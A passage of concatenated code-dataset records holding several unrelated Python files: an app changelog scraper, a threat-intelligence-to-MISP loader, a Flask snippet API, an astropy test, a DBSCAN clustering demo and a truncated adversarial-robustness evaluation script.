\"]\n for char in detele_char:\n log = log.replace(char, \"\")\n\n f = codecs.open(\"temp.txt\", \"w\", \"utf-8\")\n f.write(log)\n f.close()\n\n f = open(\"temp.txt\", \"r\")\n log = \"\"\n for line in f:\n log = log + line\n\n f.close()\n\n #log = log.replace(\"\\n\", \" \")\n unicode_logr = {\n \"\\xc2\\xb7\": \"\\n-\",\n \"\\xe2\\x80\\xa2\": \"\\n-\",\n \"\\xe2\\x80\\x94\": \"\\n-\",\n '\\xc3\\xa2\\xc2\\x80\\xc2\\xa2': \"-\",\n '\\xc3\\xb0\\xc2\\x9f\\xc2\\x91\\xc2\\xbb': '',\n '\\xc3\\x82\\xc2\\xa0': ' ',\n '\\xc3\\xa2\\xc2\\x80\\xc2\\x94': ' '\n }\n\n # print log\n\n for key in list(unicode_logr.keys()):\n log = log.replace(key, unicode_logr[key])\n\n return log\n\n\ndef process_response(resp, start_date, database):\n \"\"\"\n Get all the app update activity from start_date.\n \"\"\"\n\n tree = lxml.html.fromstring(resp)\n app_name = tree.xpath(\n '//*[@id=\"bsap_1291153\"]/div[2]/div/div[1]/div[1]/div/h1/text()')[0]\n change_log = \"\"\n for st in tree.xpath('//*[@id=\"bsap_1291153\"]/div[2]/div/div[1]/div[2]/p[2]/text()'):\n change_log = change_log + st\n change_log = format_change_log(change_log)\n\n version_set = tree.xpath(\n '//*[@id=\"bsap_1291153\"]/div[2]/div/div[2]/div[2]/div/ul/li')\n for element in version_set:\n version = element.xpath('b/text()')[0]\n version = version.split()[1]\n date = element.xpath(\"span/text()\")[0]\n date = convert_to_datetime_date(date)\n if date >= start_date:\n log_data(app_name, version, date, change_log, database)\n\n # reset changelog\n change_log = \"\"\n\n\ndef get_params(index_file):\n \"\"\"\n Params:\n index_file (string): index file name.\n\n Returns:\n (dictionary): parameters and values.\n\n >>> params = get_params(\"index.yaml\")\n >>> params['country']\n 'VN'\n >>> params['list_name']\n 'topselling_free'\n >>> params['cat_key']\n 'APPLICATION'\n \"\"\"\n stream = open(index_file, \"r\")\n params = yaml.load(stream)\n stream.close()\n\n return params\n\n\ndef scan_for_change(index_file):\n\n params = get_params(index_file)['change_logs']\n\n database = params['database_name']\n\n today = datetime.date.today()\n\n start_date = today - datetime.timedelta(params['range_of_query'])\n\n for app_info in list(params['apps_src_dest'].keys()):\n print(\"Running: \" + app_info + \"\\n\")\n url = params['apps_src_dest'][app_info][0]\n database = params['dir'] + params['apps_src_dest'][app_info][1]\n resp = start_request(url)\n process_response(resp, start_date, database)\n\n\nprint(\"Program {} start!\".format(__file__))\nscan_for_change('index_ios.yaml')\nprint(\"Program {} finish sucessfully.\".format(__file__))\n\n# if __name__ == \"__main__\":\n# import doctest\n# doctest.testmod()\n", "repo_name": "zenzjtech/Mobile-app-timeline", "sub_path": "change-logs_ios.py", "file_name": "change-logs_ios.py", "file_ext": "py", "file_size_in_byte": 4662, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 33, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 37, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 37, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 56, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 72, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 107, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 107, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 158, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 158, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 160, "usage_type": "call"}]} +{"seq_id": "23840309202", "text": "import requests\nfrom requests import HTTPError, ConnectionError, ConnectTimeout\nfrom model import Config\nfrom model.events import C2Server, Malware, Actor, Family\nfrom datetime import datetime, timedelta\nimport logging\nimport sys\n\n\nclass Loader:\n\n @staticmethod\n def start(conf, tags, type, startdate, file, noupload, searchfile, proxy_misp_addr, proxy_tie_addr):\n\n # Building Auth Header\n conf_authHeader = {'Authorization': 'Bearer ' + conf.tie_api_key}\n\n # Building URL\n date_since = startdate.strftime(\"%Y-%m-%d\")\n dt = startdate + timedelta(days=1)\n date_until = dt.strftime(\"%Y-%m-%d\")\n category = None\n finished = True\n event = None\n connection_error = False\n\n # Eventtype\n if type == 'c2server':\n event = C2Server(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_c2server, startdate)\n category = 'c2-server'\n elif type == 'malware':\n event = Malware(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_malware, startdate)\n category = 'malware'\n\n elif type == 'actor':\n event = Actor(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_actor, startdate)\n category = 'actor'\n\n elif type == 'family':\n event = Family(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_family, startdate)\n category = 'family'\n\n # Buildung parameters\n payload = dict()\n if category == 'c2-server' or category == 'malware':\n payload['category'] = category\n payload['created_since'] = date_since\n payload['created_until'] = date_until\n\n else:\n attr_list = ''\n count = 0\n for l in searchfile:\n if count is 0:\n attr_list += l\n else:\n attr_list += ',' + l\n count += 1\n attr_list = attr_list.replace('\\n', '')\n if category is 'actor':\n payload['actor'] = attr_list\n else:\n payload['family'] = attr_list\n\n url = conf.tie_api_url + conf.url_iocs\n index = 0\n connection_retrys = 1\n while finished:\n try:\n myResponse = requests.get(url, params=payload, headers=conf_authHeader, proxies=proxy_tie_addr)\n # For successful API call, response code will be 200 (OK)\n if myResponse.ok:\n # print(myResponse.status_code)\n # Loading the response data into a dict variable\n # json.loads takes in only binary or string variables so using content to fetch binary content\n # Loads (Load String) takes a Json file and converts into python data structure\n # (dict or list, depending on JSON)\n\n try:\n jsonResponse = myResponse.json()\n\n # check is TIE Response is complete\n response_has_more = None\n response_iocs = None\n response_params = None\n if 'has_more' in jsonResponse and 'iocs' in jsonResponse and 'params' in jsonResponse:\n response_has_more = jsonResponse['has_more']\n response_iocs = jsonResponse['iocs']\n response_params = jsonResponse['params']\n else:\n raise ValueError(\"Error: TIE answered with an invalid or empty JSON Response\")\n\n # parsing received IOC's\n logging.info(\"Parsing... - Offset: \" + str(index) + \" to \" + str(index + len(response_iocs)))\n index += len(response_iocs)\n\n if type == 'c2server':\n C2Server.parse(event, response_iocs, tags)\n elif type == 'malware':\n Malware.parse(event, response_iocs, tags)\n elif type == 'actor':\n Actor.parse(event, response_iocs, tags)\n elif type == 'family':\n Family.parse(event, response_iocs, tags)\n\n if response_has_more is not True:\n finished = False\n logging.info(\"There are no more attributes\")\n logging.info(\"#### Finished #####\")\n break\n else:\n if isinstance(myResponse.links, dict):\n res = myResponse.links[\"next\"]\n url = res[\"url\"]\n logging.info(\"#### Continue #####\")\n\n except ValueError:\n logging.error(\"Error: Invalid or empty JSON Response\")\n elif myResponse.status_code >= 500 and myResponse.status_code <= 550:\n logging.warning(\"It seems there are connection issues with TIE at the moment\")\n logging.warning(\"Status-Code: \" + str(myResponse.status_code) + \" - Try: \" + connection_retrys + \" from 5\")\n\n connection_retrys += 1\n if connection_retrys < 6:\n continue\n else:\n logging.error(\"TIE seems not to be available at the moment or connection is interrupted\")\n raise ConnectionError\n\n else:\n # If response code is not ok (200), print the resulting http error code with description\n logging.error(\"Error:\")\n logging.error(myResponse.content)\n myResponse.raise_for_status()\n except (HTTPError, ConnectionError, ConnectTimeout) as e:\n logging.error(\"Error:\")\n logging.error(\"TIE seems not to be available at the moment or connection is interrupted\")\n connection_error = True\n finished = False\n\n # TIE is available?\n if not noupload and not connection_error and conf.misp_api_key is not None and conf.misp_api_url is not None:\n # Add Base Tags\n if isinstance(event, C2Server):\n if tags.c2tags_base is not None:\n for val in tags.c2tags_base:\n event.append_tags(tags.c2tags_base[val])\n elif isinstance(event, Malware):\n if tags.malwaretags_base is not None:\n for val in tags.c2tags_base:\n event.append_tags(tags.c2tags_base[val])\n\n # Load things up\n try:\n event.upload(conf, proxy_misp_addr)\n except Exception as e:\n logging.error(\"Error uploading event to MISP. Something went wrong...\\n\")\n\n else:\n if not noupload and not connection_error:\n logging.warning(\"Can not upload event. MISP API key or MISP API URL is missing\")\n\n if file:\n # Serialize event as MISP Event\n json_output = event.serialize()\n outfile = type + \"_\" + str(event.uuid) + \".json\"\n logging.info(\"Saved attributes as JSON-File: \" + outfile)\n with open(outfile, \"w\") as text_file:\n text_file.write(json_output)\n\n @staticmethod\n def init_logger(logPath, fileName, logLvl, consoleLog, fileLog):\n\n logger = logging.getLogger()\n logger.setLevel(logLvl)\n formatter = logging.Formatter('%(asctime)s [%(levelname)-5.5s] %(message)s')\n\n consoleHandler = logging.StreamHandler(sys.stdout)\n\n consoleHandler.setFormatter(formatter)\n logger.addHandler(consoleHandler)\n\n if consoleLog is False:\n consoleHandler.setLevel(logLvl)\n else:\n consoleHandler.setLevel(100)\n\n if fileLog is False:\n fileHandler = logging.FileHandler(\"{0}/{1}.log\".format(logPath, fileName))\n fileHandler.setFormatter(formatter)\n fileHandler.setLevel(logLvl)\n logger.addHandler(fileHandler)\n\n", "repo_name": "DCSO/tie2misp", "sub_path": "loader.py", "file_name": "loader.py", "file_ext": "py", "file_size_in_byte": 8553, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.timedelta", "line_number": 20, "usage_type": "call"}, {"api_name": "model.events.C2Server", "line_number": 29, "usage_type": "call"}, {"api_name": "model.events.Malware", "line_number": 33, "usage_type": "call"}, {"api_name": "model.events.Actor", "line_number": 38, "usage_type": "call"}, {"api_name": "model.events.Family", "line_number": 43, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 74, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 98, "usage_type": "call"}, {"api_name": "model.events.C2Server.parse", "line_number": 102, "usage_type": "call"}, {"api_name": "model.events.C2Server", "line_number": 102, "usage_type": "name"}, {"api_name": "model.events.Malware.parse", "line_number": 104, "usage_type": "call"}, {"api_name": "model.events.Malware", "line_number": 104, "usage_type": "name"}, {"api_name": "model.events.Actor.parse", "line_number": 106, "usage_type": "call"}, {"api_name": "model.events.Actor", "line_number": 106, "usage_type": "name"}, {"api_name": "model.events.Family.parse", "line_number": 108, "usage_type": "call"}, {"api_name": "model.events.Family", "line_number": 108, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 112, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 119, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 124, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 125, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 131, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 132, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 136, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 137, "usage_type": "call"}, {"api_name": "requests.HTTPError", "line_number": 139, "usage_type": "name"}, {"api_name": "requests.ConnectionError", "line_number": 139, "usage_type": "name"}, {"api_name": "requests.ConnectTimeout", "line_number": 139, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 140, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 141, "usage_type": "call"}, {"api_name": "model.events.C2Server", "line_number": 148, "usage_type": "argument"}, {"api_name": "model.events.Malware", "line_number": 152, "usage_type": "argument"}, {"api_name": "logging.error", "line_number": 161, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 165, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 171, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 178, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 180, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 182, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 182, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "74741752489", "text": "import os\nfrom flask import Flask, jsonify, request, send_from_directory, render_template\nfrom models_wrapper import CodeSnippet\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport sys\nfrom flask_cors import CORS\nfrom sqlalchemy import or_\n\n# Initialize Flask app\napp = Flask(__name__)\n\n# Add CORS middleware to allow cross-origin requests\ncors = CORS(app)\n\n# Database configurations\nDB_NAME = \"mydatabase\"\nDB_USER = \"your_new_user\"\nDB_PASSWORD = \"qwerty\"\nDB_HOST = \"localhost\"\nDB_PORT = \"5432\"\n\n# Create a database engine and a session factory\nengine = create_engine(f\"postgresql://{DB_USER}:{DB_PASSWORD}@{DB_HOST}:{DB_PORT}/{DB_NAME}\")\nSession = sessionmaker(bind=engine)\n\n# API endpoint to add a new code snippet\n@app.route('/add_snippet', methods=['POST'])\ndef add_snippet():\n # Get the data from the request\n snippet_data = request.json\n\n # Create a session and add a new code snippet to the database\n session = Session()\n new_snippet = CodeSnippet(\n name=snippet_data['name'],\n description=snippet_data['description'],\n file_path=snippet_data['file_path'],\n code=snippet_data['code']\n )\n session.add(new_snippet)\n session.commit()\n\n # Return a success message\n return jsonify({'message': 'Code snippet added successfully.'})\n\n# API endpoint to search code snippets\n@app.route('/search', methods=['POST'])\ndef search_code_snippets():\n # Get search criteria from the request\n search_data = request.json\n\n # Create a session and query the database\n session = Session()\n query = session.query(CodeSnippet)\n\n # Apply search filters\n query = query.filter(\n or_(\n CodeSnippet.name.contains(search_data['name']),\n CodeSnippet.description.contains(search_data['description']),\n CodeSnippet.code.contains(search_data['code'])\n )\n )\n\n # Fetch results and convert them to a list of dictionaries\n results = query.all()\n response_data = [{'id': result.id, 'name': result.name, 'description': result.description, 'file_path': result.file_path, 'code': result.code, 'latest_commit': result.latest_commit} for result in results]\n\n # Debugging\n print('Search data:', search_data)\n print('Query:', query)\n print('Results:', results)\n print('Response data:', response_data)\n\n # Print executed SQL\n print(\"Executed SQL:\", query.statement.compile(compile_kwargs={\"literal_binds\": True}))\n\n # Return JSON response\n return jsonify(response_data)\n\n@app.route('/generate', methods=['POST'])\ndef generate():\n data = request.get_json()\n input_text = data.get('input')\n code_snippet = CodeSnippet(input_text)\n code = code_snippet.generate_code()\n return jsonify({\"code\": code})\n\n@app.route('/index1.html')\ndef index1():\n return send_from_directory(os.path.join(os.path.dirname(__file__), 'templates'), 'index1.html')\n\n@app.route('/get_all_files', methods=['GET'])\ndef get_all_files():\n # Create a session and query the database\n session = Session()\n query = session.query(CodeSnippet)\n\n # Fetch all code snippets\n results = query.all()\n\n # Organize the results in a list of dictionaries\n organized_data = []\n for result in results:\n organized_data.append({\n 'script_name': result.name,\n 'description': result.description,\n 'id': result.id,\n 'file_path': result.file_path,\n 'code': result.code,\n 'latest_commit': result.latest_commit\n })\n\n # Return JSON response\n return jsonify(organized_data)\n\n@app.route('/view_json')\ndef view_json():\n # Get the code snippets as a JSON string\n json_data = get_all_files().get_data(as_text=True)\n\n return render_template('view_json.html', json_data=json_data)\n\n\n\n\ndef run():\n app.run(debug=True, use_reloader=False)\n\n# Run Flask app\nif __name__ == '__main__':\n run()\n", "repo_name": "thepwnman33/Magicus", "sub_path": "apitest.py", "file_name": "apitest.py", "file_ext": "py", "file_size_in_byte": 3920, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 55, "usage_type": "argument"}, {"api_name": "sqlalchemy.or_", "line_number": 59, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.name.contains", "line_number": 60, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.name", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 60, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet.description.contains", "line_number": 61, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.description", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 61, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet.code.contains", "line_number": 62, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.code", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 92, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 98, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 116, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 123, "usage_type": "call"}]} +{"seq_id": "30827508988", "text": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport pytest\n\nfrom astropy import cosmology\nfrom astropy.cosmology import Cosmology\nfrom astropy.cosmology.core import _COSMOLOGY_CLASSES\nfrom astropy.table import QTable, vstack\nfrom astropy.utils.compat import optional_deps\nfrom astropy.utils.exceptions import AstropyUserWarning\n\n\nclass CosmologyWithKwargs(Cosmology):\n def __init__(self, name=\"cosmology with kwargs\", meta=None, **kwargs):\n super().__init__(name=name, meta=meta)\n\n\ncosmo_instances = [\n getattr(cosmology.realizations, name) for name in cosmology.parameters.available\n]\ncosmo_instances.append(CosmologyWithKwargs())\n\n\ndef teardown_module(module):\n # pop CosmologyWithKwargs from registered classes\n # but don't error b/c it fails in parallel\n _COSMOLOGY_CLASSES.pop(CosmologyWithKwargs.__qualname__, None)\n\n\n###############################################################################\n\n@pytest.mark.parametrize(\"expected\", cosmo_instances)\ndef test_to_from_mapping_instance(expected):\n # ------------\n # To Mapping\n params = expected.to_format('mapping')\n\n assert isinstance(params, dict)\n assert params[\"cosmology\"] is expected.__class__\n assert params[\"name\"] == expected.name\n\n # ------------\n # From Mapping\n params[\"mismatching\"] = \"will error\"\n\n # tests are different if the last argument is a **kwarg\n if tuple(expected._init_signature.parameters.values())[-1].kind == 4:\n got = Cosmology.from_format(params, format=\"mapping\")\n\n assert got.__class__ == expected.__class__\n assert got.name == expected.name\n assert \"mismatching\" not in got.meta\n\n return # don't continue testing\n\n # read with mismatching parameters errors\n with pytest.raises(TypeError, match=\"there are unused parameters\"):\n Cosmology.from_format(params, format=\"mapping\")\n\n # unless mismatched are moved to meta\n got = Cosmology.from_format(params, format=\"mapping\", move_to_meta=True)\n assert got.__class__ == expected.__class__\n assert got == expected\n assert got.meta[\"mismatching\"] == \"will error\"\n\n # it won't error if everything matches up\n params.pop(\"mismatching\")\n got = Cosmology.from_format(params, format=\"mapping\")\n assert got.__class__ == expected.__class__\n assert got == expected\n\n # and it will also work if the cosmology is a string\n params[\"cosmology\"] = params[\"cosmology\"].__name__\n got = Cosmology.from_format(params, format=\"mapping\")\n assert got == expected\n\n # also it auto-identifies 'format'\n got = Cosmology.from_format(params)\n assert got == expected\n", "repo_name": "CNwangbin/astropy", "sub_path": "astropy/cosmology/io/tests/test_mapping.py", "file_name": "test_mapping.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "astropy.cosmology.Cosmology", "line_number": 13, "usage_type": "name"}, {"api_name": "astropy.cosmology.realizations", "line_number": 19, "usage_type": "attribute"}, {"api_name": "astropy.cosmology", "line_number": 19, "usage_type": "name"}, {"api_name": "astropy.cosmology.parameters", "line_number": 19, "usage_type": "attribute"}, {"api_name": "astropy.cosmology.core._COSMOLOGY_CLASSES.pop", "line_number": 27, "usage_type": "call"}, {"api_name": "astropy.cosmology.core._COSMOLOGY_CLASSES", "line_number": 27, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 48, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 48, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 57, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 58, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 58, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 61, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 61, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 68, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 68, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 74, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 74, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 78, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 78, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 32, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "9261746599", "text": "# DBSCAN聚类\r\nfrom sklearn import datasets\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport copy\r\ndef find_neighbor(j, x, eps):\r\n N = list()\r\n for i in range(x.shape[0]):\r\n # 计算欧式距离\r\n temp = np.sqrt(np.sum(np.square(x[j] - x[i])))\r\n if temp <= eps:\r\n N.append(i)\r\n return set(N)\r\ndef DBSCAN(X, eps, min_Pts):\r\n k = -1\r\n neighbor_list = [] # 用来保存每个数据的邻域\r\n omega_list = [] # 核心对象集合\r\n # 初始时将所有点标记为未访问\r\n gama = set([x for x in range(len(X))])\r\n cluster = [-1 for _ in range(len(X))] # 聚类\r\n for i in range(len(X)):\r\n neighbor_list.append(find_neighbor(i, X, eps))\r\n if len(neighbor_list[-1]) >= min_Pts:\r\n # 将样本加入核心对象集合\r\n omega_list.append(i)\r\n # 转化为集合便于操作\r\n omega_list = set(omega_list)\r\n while len(omega_list) > 0:\r\n gama_old = copy.deepcopy(gama)\r\n # 随机选取一个核心对象\r\n j = random.choice(list(omega_list))\r\n k = k + 1\r\n Q = list()\r\n Q.append(j)\r\n gama.remove(j)\r\n while len(Q) > 0:\r\n q = Q[0]\r\n Q.remove(q)\r\n if len(neighbor_list[q]) >= min_Pts:\r\n delta = neighbor_list[q] &gama\r\n deltalist = list(delta)\r\n for i in range(len(delta)):\r\n Q.append(deltalist[i])\r\n gama = gama - delta\r\n Ck = gama_old - gama\r\n Cklist = list(Ck)\r\n for i in range(len(Ck)):\r\n cluster[Cklist[i]] = k\r\n omega_list = omega_list - Ck\r\n return cluster\r\nX1, y1 = datasets.make_circles(n_samples=2000, factor=.6, noise=.02)\r\nX2, y2 = datasets.make_blobs(n_samples=400, n_features=2, centers=[[1.2, 1.2]], cluster_std=[[.1]], random_state=9)\r\nX = np.concatenate((X1, X2))\r\neps = 0.08\r\nmin_Pts = 10\r\nbegin = time.time()\r\nC = DBSCAN(X, eps, min_Pts)\r\nend = time.time()\r\nplt.figure()\r\nplt.scatter(X[:, 0], X[:, 1], c=C)\r\nplt.show()", "repo_name": "HuichuanLI/play_with_machine_learning_book", "sub_path": "一些经典的机器学习的实现/DBSCAN.py", "file_name": "DBSCAN.py", "file_ext": "py", "file_size_in_byte": 2099, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sqrt", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 12, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 31, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_circles", "line_number": 53, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 53, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 55, "usage_type": "call"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "34177809772", "text": "from __future__ import print_function\nimport os\nimport itertools\nimport re\nimport argparse\nimport logging\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom datasets import SemiSupervisedDataset, DATASETS\nfrom torchvision import transforms\nimport torch.backends.cudnn as cudnn\nfrom utils import get_model\nimport spatial\nimport json\n\nNUM_ROT = 31\nNUM_TRANS = 5\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n\ndef transform(x, rotation, translation):\n assert x.shape[1] == 3\n\n with torch.no_grad():\n translated = spatial.transform(x, rotation, translation)\n\n return translated\n\n\ndef get_spatial_adv_example(model, X, y, max_rot=30, max_trans=0.1071):\n\n def calc_correct(inp):\n output = model(inp)\n targets = y.repeat([inp.shape[0]])\n return (output.argmax(dim=1) == targets).long()\n\n with torch.no_grad():\n rots = torch.linspace(-max_rot, max_rot, steps=NUM_ROT)\n trans = torch.linspace(-max_trans, max_trans, steps=NUM_TRANS)\n tfms = torch.tensor(list(itertools.product(rots, trans, trans))).cuda(device=device)\n all_rots = tfms[:, 0]\n all_trans = tfms[:, 1:]\n\n ntfm = all_rots.shape[0]\n transformed = transform(X.repeat([ntfm, 1, 1, 1]), all_rots, all_trans)\n torch.clamp(transformed, 0, 1.0)\n\n # X_pgd = Variable(torch.zeros(X.data.shape), requires_grad=True)\n MAX_BS = 128\n i = 0\n while i < ntfm:\n to_do = transformed[i:i+MAX_BS]\n is_correct = calc_correct(to_do)\n argmin = is_correct.argmin()\n if is_correct[argmin] == 0:\n return transformed[i+argmin:i+argmin+1].squeeze_(0)\n\n i += MAX_BS\n else:\n return transformed[0:1].squeeze_(0)\n\n\ndef apply(func, M):\n tList = [func(m) for m in torch.unbind(M, dim=0)]\n return torch.stack(tList, dim=0)\n\n\ndef get_batch_spatial_adv_example(model, X, y, max_rot=30, max_trans=0.1071, random=False, wo10=False):\n def calc_correct(inp):\n output = model(inp)\n return (output.argmax(dim=1) == y).long()\n\n if random:\n bs = X.shape[0]\n rots = spatial.unif((bs,), -max_rot, max_rot)\n txs = spatial.unif((bs, 2), -max_trans, max_trans)\n transformed = transform(X, rots, txs)\n return transformed\n\n elif wo10:\n all_transformed = []\n all_is_corrects = []\n for i in range(10):\n bs = X.shape[0]\n rots = spatial.unif((bs,), -max_rot, max_rot)\n txs = spatial.unif((bs, 2), -max_trans, max_trans)\n transformed = transform(X, rots, txs)\n all_transformed.append(transformed)\n all_is_corrects.append(calc_correct(transformed))\n aic = torch.stack(all_is_corrects, dim=0).argmin(dim=0)\n all_transformed = torch.stack(all_transformed, dim=0)\n X_pgd = []\n for j, i in enumerate(torch.unbind(aic, dim=0)):\n X_pgd.append(all_transformed[i, j])\n X_pgd = torch.stack(X_pgd, dim=0)\n return X_pgd\n else:\n # otherwise grid\n X_pgd = []\n for cur_x, cur_y in zip(torch.unbind(X, dim=0), torch.unbind(y, dim=0)):\n X_pgd.append(get_spatial_adv_example(model, cur_x, cur_y, max_rot, max_trans))\n X_pgd = torch.stack(X_pgd, dim=0)\n return X_pgd\n\n\ndef pgd_whitebox_spatial(model, X, y, max_rot=30, max_trans=0.1071, random=False, eval=False):\n wo10 = (not random and not eval)\n X_pgd = get_batch_spatial_adv_example(model, X, y, max_rot, max_trans, random=random, wo10=wo10)\n err = (model(X).data.max(1)[1] != y.data).float().sum()\n err_pgd = (model(X_pgd).data.max(1)[1] != y.data).float().sum()\n return err, err_pgd\n\n\ndef 